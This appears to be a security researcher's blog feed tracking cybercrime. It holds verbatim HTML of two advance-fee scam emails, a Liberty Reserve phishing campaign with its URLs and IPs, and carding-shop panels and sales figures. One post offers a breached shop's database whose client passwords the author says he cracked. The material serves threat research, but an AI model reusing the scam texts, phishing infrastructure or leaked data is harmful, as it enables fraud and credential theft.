<FONTsize=3face="Times New Roman">The United Nations in collaboration with Union Bank Plc is compensating flood Victims and those that were defrauded around the world with the sum of $500,000.00 only.</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">With the recent events around the world, the United Nations, after thorough review and evaluation, deemed it fit to compensate those that were financially defrauded and also those that lost huge properties as a result of various natural disasters.</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">We therefore, advice you stop further communication with any correspondence outside this office as you do not have to pay money to anybody or officer of this Bank or Organisation to receive this compensation Fund.</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">Furthermore, should you by any way receive this message, you should be required to present to us, an affidavit and a valid tax clearance certificate as to make claim for this noble compensation.</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">Finally, we once again congratulate you and wish you to send to us the following information:</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">Name</FONT><BR>
<FONTsize=3face="Times New Roman">Contact Address</FONT><BR>
<FONTsize=3face="Times New Roman">Occupation</FONT><BR>
<FONTsize=3face="Times New Roman">Age</FONT><BR>
<FONTsize=3face="Times New Roman">Sex</FONT><BR>
<FONTsize=3face="Times New Roman">Country</FONT><BR>
<FONTsize=3face="Times New Roman">Telephone number.</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">Yours Sincerely,</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">Joseph Ginear</FONT><BR>
<FONTsize=3face="Times New Roman">Head, Coordinator,</FONT><BR>
<FONTsize=3face="Times New Roman">Compensation Unit</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
</FONT>
</BODY></HTML>
---
Subject: YOU HAVE BEEN AWARDED A NEW ATM CARD!!!!!
This is HTML source of message you composed. Do not modify here.</COMMENT>
To modify this message press HTML Messages Editor button.</COMMENT>
<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODYbgcolor=#FFFFFF leftmargin=5 topmargin=5 rightmargin=5 bottommargin=5>
<FONTsize=2color=#000000 face="Arial">
<DIV>
<FONTsize=3color=#000000 face="Georgia">YOU HAVE BEEN AWARDED A NEW ATM CARD!!!!!</FONT><FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">Due to your long over-due fund which you have been finding it difficult to receive via a Certified Bank Draft issued by Deferent organization, We have arranged your payment through our International ATM CARD PAYMENT CENTRE in Europe, America, Africa and Asia Pacific, this is part of an instruction/mandate passed by the Senate in respect to overseas contract payment and debt re-scheduling.</FONT><FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">We will send you an International Swift ATM CARD ( Master Card) which you are to use in accessing your fund via in any ATM MACHINE location any Where in the world, and the maximum daily limit is Four Thousand United States Dollars ($4,000.00) valued sum at Two Million Five Hundred thousand United States Dollars {$2,500,000.00}. If you desire to receive your fund this way kindly contacts the ATM officer via email: atmpaymento@yahoo.fr</FONT><FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">NOTE: you are to re-confirm your details so as to facilitate the immediate release of your ATM CARD immediately.</FONT><FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">(1) Your Full Name.</FONT><FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">(2) Full Residential Address...</FONT><FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">(3) Direct and Current Phone:</FONT><FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">(4) Nationality.</FONT><FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">(5) Present Country.</FONT><FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTcolor=#000000> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">Please Note: As soon as your details have been received here by the SWIFTATM CARD CENTER, you are therefore advised to stop any further communications with All other bodies such as the Compensation and Finance House, Lottery Organizations etc....</FONT><FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTcolor=#000000> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">You have to act fast so as to facilitate the immediate release of your ATM Card and more so as to avoid miss-appropriation of your Card. Please be aware that you are the only person Left to receive your ATM Card out of the three beneficiaries. Please note our ATM CODE of conduct is (ATM 007) as this is to be your subject when responding to our email to prove that truly, you received our email.</FONT><FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTcolor=#000000> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">We shall be expecting to receive your information as you Have to stop any further communication with anybody or office.</FONT><FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTcolor=#000000> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">Thanks for your co-operation.</FONT></DIV>
<DIV>
<FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">International ATM CARD PAYMENT CENTRE.</FONT><FONTcolor=#000000></FONT></DIV>
<DIV>
<FONTcolor=#000000> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Georgia">MR.BEN MARTINS.</FONT></DIV>
</FONT>
</BODY></HTML>


Edit 23 Feb:


http://pastebin.com/bWYfgz5D

Carding on compromised RDP

$
0
0
I don't think i need to explain the screenshots.


---
No mail found on this one:
---

And too many others, logs are full of mails adress and credit cards informations...

Phish-BankFraud EDF again and again


octavian.su (carder shop)

$
0
0

Adv:

domain: OCTAVIAN.SU
nserver: fns1.dnspark.net.
nserver: fns2.dnspark.net.
state: REGISTERED, DELEGATED
person: Private Person
e-mail: fpolev@mail.ru
IP: 186.2.160.6
inetnum: 186.2.160/22
status: reallocated
owner: DDoS-Guard.net
ownerid: BZ-DDOS-LACNIC
responsible: Alexander Golovin
address: 1/2Miles Northern Highway, Belize City, Belize, ,
address: - Belize City - BZ


Login:

News:

Buy CC:

CC orders:

Buy dumps:

Dump orders:

BinLookup:

Checker:

Tickets:

Edit account:

View cart:

Add money:

Terms (?!):

FAQ:

Bug report:

Liberty Reserve phishing

$
0
0
Since some days i receive Liberty reserve (a Costa Rica-based payment processor) phishings, i usually don't see LR phishs.

no_reply@libertyreseve.com
Recevied yesterday, 13.3.7 (07/03/13)
 Leading on a legit liberty reserve payement page
https://sci.libertyreserve.com/?lr_acc=U2909099

And today, leading on phishing, still same sender:
no_reply@libertyreseve.com

The hyperlink lead to 64.32.10.171 who lead on libretyeserve.com (204.188.221.238)
http://libretyeserve.com/start.php
http://libretyeserve.com/a.php
http://libretyeserve.com/logipin.php
http://libretyeserve.com/welcome.php
http://libretyeserve.com/start.php
http://libretyeserve.com/captcha.php
http://libretyeserve.com/transfer.php
http://libretyeserve.com/index_old.php
http://libretyeserve.com/curl.php
http://libretyeserve.com/cookies/
http://libretyeserve.com/temp/
http://libretyeserve.com/logs/
https://www.virustotal.com/fr/url/729a0778a90efa48b4508661cd1fad4c140e7ee9ded8c5a56f89f3b6c754212b/analysis/1362751719/

64.32.10.171 ~
http://64.32.10.171/index1.php
http://64.32.10.171/config.php
http://64.32.10.171/js/core.js
http://64.32.10.171/logs/welcome_lpin.html
http://64.32.10.171/templates/welcome.html
http://64.32.10.171/templates/transfer.html
http://64.32.10.171/templates/login.html
http://64.32.10.171/templates/success.html
http://64.32.10.171/templates/cancel.html
http://64.32.10.171/templates/purpose.html
http://64.32.10.171/templates/index_old.html
http://64.32.10.171/templates/confirm.html
http://64.32.10.171/en/
https://www.virustotal.com/fr/url/3d50e4b5072439be2f4537825a99014dbfa75d8c980c1abdcb664cee58a7ae2e/analysis/1362751808/
Beware, they are not yet detected by Google Safe Browsing and shit's

Also, I currently work on a huge project who take all my attention for the moment (that the reason of my inactivity here)
i'll be back in ~1 week.



Kawaii Security (カワイイセキュリティ)

$
0
0
I recently came across a book called Kawaii Security
http://pandalabs.pandasecurity.com/kawaii-security-japan-is-different/


I don't understand Japaness but the book is quite nice, paper quality is very good, illustrations aresuperb, and all have a manga book size.


I don't know what's inside the CD, probably Panda Security

Malwares illustrated:
The book have plenty of other malware illustrations.
Trojan/Bot:
SpyWare/FakeSoftware:

Small story splitted in 4 parts inside:

AV-tans:

Attack scheme of an exploit pack:

HS: I'm back !

VMADUMPS (Carding shop)

$
0
0
Another carder shop, similar to dumpslogs, they sell track2.
vmadumps.cc - 80.82.64.21
Registrant Contact:
none
onofrio castaldi ()
Fax:
via DOMENICO CUCCHIARI nr.60
rome, rome 00159
IT
Creation date: 20 Sep 2012 10:20:00
Expiration date: 20 Sep 2013 07:20:00


Banner:

Advert:

Login:

News:

Find cards:

Client area:

Credit history:

Reload credit:

Ticket:

Buy dumps:

Buy bulk:

Track2 checker:

Help and FAQ:

Some weird urls:
vmadumps.cc/Mail.php
vmadumps.cc/activ.php
vmadumps.cc/PEAR.php

lol:

Admin panel:


News:

Add product:

Stats (some will be interested by numbers i thinks)

The 17 march california has 1580 products.
From the 17 march california there are 234 meaning 14.8% products bought.
Total products that wore checked 66 and 36 (54.5%) passed the check meaning 2.3% from the total of base products
People spent a total of 3055$
---
The 17 march massachusetts has 2149 products.
From the 17 march massachusetts there are 483 meaning 22.5% products bought.
Total products that wore checked 99 and 53 (53.5%) passed the check meaning 2.5% from the total of base products
People spent a total of 7820$
---
The bulk no replace has 33323 products.
From the bulk no replace there are 112049 meaning 336.3% products bought.
Total products that wore checked 13238 and 8065 (60.9%) passed the check meaning 24.2% from the total of base products
People spent a total of 320123$
---
The 12 march california has 530 products.
From the 12 march california there are 482 meaning 90.9% products bought.
Total products that wore checked 195 and 126 (64.6%) passed the check meaning 23.8% from the total of base products
People spent a total of 6965$
---
The 17 march mix 201 has 1699 products.
From the 17 march mix 201 there are 382 meaning 22.5% products bought.
Total products that wore checked 84 and 55 (65.5%) passed the check meaning 3.2% from the total of base products
People spent a total of 15445$
---
The 17 march new york has 2475 products.
From the 17 march new york there are 366 meaning 14.8% products bought.
Total products that wore checked 82 and 38 (46.3%) passed the check meaning 1.5% from the total of base products
People spent a total of 5275$
---
The 17 march florida has 4032 products.
From the 17 march florida there are 558 meaning 13.8% products bought.
Total products that wore checked 115 and 72 (62.6%) passed the check meaning 1.8% from the total of base products
People spent a total of 8215$
---
The 12 march florida has 2642 products.
From the 12 march florida there are 1405 meaning 53.2% products bought.
Total products that wore checked 520 and 324 (62.3%) passed the check meaning 12.3% from the total of base products
People spent a total of 17810$
---
The 7 march massachusetts has 727 products.
From the 7 march massachusetts there are 877 meaning 120.6% products bought.
Total products that wore checked 276 and 135 (48.9%) passed the check meaning 18.6% from the total of base products
People spent a total of 11760$
---
The 12 march new york has 661 products.
From the 12 march new york there are 859 meaning 130% products bought.
Total products that wore checked 287 and 160 (55.7%) passed the check meaning 24.2% from the total of base products
People spent a total of 11345$
---
The 12 march east coast mix has 827 products.
From the 12 march east coast mix there are 715 meaning 86.5% products bought.
Total products that wore checked 215 and 115 (53.5%) passed the check meaning 13.9% from the total of base products
People spent a total of 9440$
---
The 7 march florida has 2788 products.
From the 7 march florida there are 578 meaning 20.7% products bought.
Total products that wore checked 223 and 146 (65.5%) passed the check meaning 5.2% from the total of base products
People spent a total of 8245$
---
The 7 march new york has 988 products.
From the 7 march new york there are 1001 meaning 101.3% products bought.
Total products that wore checked 400 and 260 (65%) passed the check meaning 26.3% from the total of base products
People spent a total of 12535$
---
The 7 march new jersey has 591 products.
From the 7 march new jersey there are 625 meaning 105.8% products bought.
Total products that wore checked 244 and 138 (56.6%) passed the check meaning 23.4% from the total of base products
People spent a total of 7040$
---
The 28 february florida has 2256 products.
From the 28 february florida there are 1781 meaning 78.9% products bought.
Total products that wore checked 682 and 447 (65.5%) passed the check meaning 19.8% from the total of base products
People spent a total of 21565$
---
The 7 march california has 1114 products.
From the 7 march california there are 886 meaning 79.5% products bought.
Total products that wore checked 408 and 248 (60.8%) passed the check meaning 22.3% from the total of base products
People spent a total of 11450$

admins:

Clients:

Track1 bin:

Track2:

Transactions:

Sold:

Bins:

Settings:

database:

3k clients, i've broke ~55% of passwords with a simple brute force and a basic dictionary.
You want a copy ? oh... ok.
http://temari.fr/vmadumps.cc.zip
PHP+SQL, tracks2 and credit cards are not included of course
Happy hunting.


Storm 3 is awesome.

Embosser and BSR

$
0
0


You guessed it i bought some new toys for my cybercrime object collection...
The first is a PVC ID Credit Card Embossing  machine, who costed me 275,48 EUR:

Manual:

Tools:

Demo-card:


Machine:

And A barcode badge card reader who costed me 158,51 EUR

Who can read unprotected and protected barcodes

Utility:


And a small video, (in french sorry)
Viewing all 128 articles
Browse latest View live